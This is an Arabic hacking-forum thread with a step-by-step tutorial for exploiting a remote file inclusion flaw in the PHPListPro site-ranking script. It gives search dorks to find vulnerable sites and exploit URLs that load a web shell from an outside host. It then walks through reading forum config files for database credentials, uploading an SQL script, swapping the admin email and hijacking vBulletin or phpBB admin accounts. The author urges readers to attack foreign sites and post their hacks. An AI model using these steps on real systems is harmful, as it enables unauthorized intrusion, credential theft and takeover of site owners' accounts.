Members Login
Username 
 
Password 
    Remember Me  
Post Info TOPIC: حصريا شرح ثغرةPHPListProسباق المواقع+رفع الشل+اختراق الموقع والمنتدي خطوة بخطوة
Anonymous

Date:
حصريا شرح ثغرةPHPListProسباق المواقع+رفع الشل+اختراق الموقع والمنتدي خطوة بخطوة
Permalink   
 









اليوم راح نشرح ثغرة في سكربت PHPListPro
سكربت سباق المواقع
مواقع كثير جدا مصابة بها وقليل منها بالمواقع العربية
والحمدلله حذرت الكثير من المواقع العربية بهذة الثغرة
وراح نشرح الثغرة خطوة بخطوة حتي نخترق الموقع وندخل لوحة تحكم المنتدي نفسة
لنبدأ علي بركة الله


نبذة عن الثغرة
المصدر
http://securityreason.com/exploit*****/581
الثغرة نازلة من مدة
وهناك اكثر من استثمار
ولاكن اهمهم واكثرهم استخدام راح نطبق علية الدرس
اول شئ قم بالدخول الي موقع بحث مفضل لك

www.google.com
www.yahoo.com
او اي موقع بحث
اكتب بخانة البحث الاتي



كود PHP:

phpListPro 
او


كود PHP:

PHPListPro ©2001-2006 SmartISoft 

تظهر لك نتائج كثيرة

نيجي لكود الاستغلال
وفي اكثر من كود


كود PHP:

editsite.php?returnpath=http://www.kondor4.com/HY0.txt? 
او


كود PHP:

config.php?returnpath=http://www.kondor4.com/HY0.txt? 
او


كود PHP:

in.php?returnpath=http://www.kondor4.com/HY0.txt? 
او


كود PHP:

addsite.php?returnpath=http://www.kondor4.com/HY0.txt? 
راح نطبق الدرس علي الاستثمار مثلا هذا


كود PHP:

config.php?returnpath=http://www.kondor4.com/HY0.txt? 
الان بعد رابط الموقع ضع الاستثمار ليصبح كلتالي

ببساطة راح تدخل الشل

الان نلقي نظرة علي ملفات الموقع ونشوف فين ملف المنتدى نشوف هنلاقي اية

ابو الشباب مزاجة رايق مركب 3 منتديات
2 منتدي من نوع vBulletin
والثالث من نوع phpbb
راح نطبق علي الاثنين
لنبدا اولا بمنتدي phpbb
ندخل مجلد المنتدي
ومن ثم البحث عن ملف الكونفيج


وندخل نقرأ بيانات الكونفيج

انسخ البيانات اللي راح تلاقيها بملف الكونفيج

لو المنتدي اللي راح تخترقة منتدي vb
قم بالدخول الي المجلد المنتدي ومن ثم ادخل علي

ومن ثم ابحث علي ملف الكونفيج

كل المنتديات طريقتها واحدة تقريبا يعني مافي فرق
طيب
الان معنا بيانات الكونفيج
نبدأ باستغلالها
في اعلي الشل اضغط


يظهر لك مثل

نكتب فيها بيانات الكونفيح اللي طلعناها
توضيح مثلا

طيب لو تم الدخول ندخل علي جول اليوزر ونغير اميلنا باميل صاحب الموقع الطريقة محفوظة
بي هذة الطريقة تتوقف علي حسب صلاحياتك علي السيرفر
الافضل نرفع سكربت يتصل بقواعد البيانات
هذة الطريقة افضل في هذة الحالة
سكربت الاتصال بقواعد البيانات موجود بالمرفقات حملة وتابع معي الشرح
طيب الان عايزين نرفع ملف السكربت
لازم نشوف مجلد علية تصريح 777 حتي نتمكن من رفع السكربت فية
نرجع الي الشل ونشوف اي مجلد علية تصريح


عندنا مجلدين عليهم التصريح
طيب ندخل اي مجلد علية تصريح ونزل الي اسفل حتي نري

ارفع السكربت

ثم

طيب الان رفعنا السكربت بمجلد banners
والسكربت اسمة sql.php
يعني الامتداد كدة
banners/sql.php
يعني يكون الرابط كالتالي
www.xxxx.com/banners/sql.php

نجد السكربت شغال

نكتب بيانات اللي معنا من ملف الكونفيج فية

توضيح

الان بعد الدخول نلاقي كل قواعد البيانات ظاهرة امامنا

نبحث ونختار منها قاعدة بيانات المنتدي اللي طلعناها من ملف الكونفيج
ونضغط علي القاعدة

نشوف امامنا الجداول

لو المنتدي phpbb يهمنا الجدول

ولو منتدي vb يهمنا جدول

اضغط علي الجدول الان
نشوف بياناتة امامنا الان

تابع الشرح







تقرير عن مشاركة مخالفة  
الرد مع إقتباس الرد السريع على هذه المشاركة




الكوندور

عرض الملف الشخصي الخاص بالعضو

إيجاد المزيد من المشاركات لـ الكوندور

إضافة الكوندور إلى قائمة الأصدقاء لديك







قديم اليوم, 10:40 AM
  رقم المشاركة : 2


الكوندور
vbmenu_register("postmenu_144169", true);








الكوندور is offline









Thumbs up






تابع معي

اضغط edit

ثم نغير بريد الادمن الي بريدك

وبالنهاية انزل اسفل واضغط

الان اذهب الي المنتدي وقم بطلب كلمة المرور (نموذج استعادة كلمة المرور)


انتظر حتي تصلك علي البريد كلمة المرور الجديدة
ثم ادخل بيها المنتدي


وتقدر تدخل الان لوحة تحكم المنتدي

مبروك علية
تم الاختراق
افعل ما شئت بالمنتدي

طبعا بالنهاية تم تبليغ صاحب الموقع بالثغرة
والله علي ما اقول شهيد



ابعدوا عن المواقع العربية ياشباب
تري وربي المواقع الاجنبية مصابة بكثرة

بالنهاية اتمني يكون الشرح واضح وسهل
وضحت فية علي قدر المستطاع
وعايزين نشوف قسم الانجازات ممتلئ من الاختراقات والابطردكم من المنتدي كلة
تحياتي الي الجميع

الكوندور المصري




__________________
Page 1 of 1  sorted by
 Add/remove tags to this thread
Quick Reply

Please log in to post quick replies.

Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse
Powered by ActiveBoard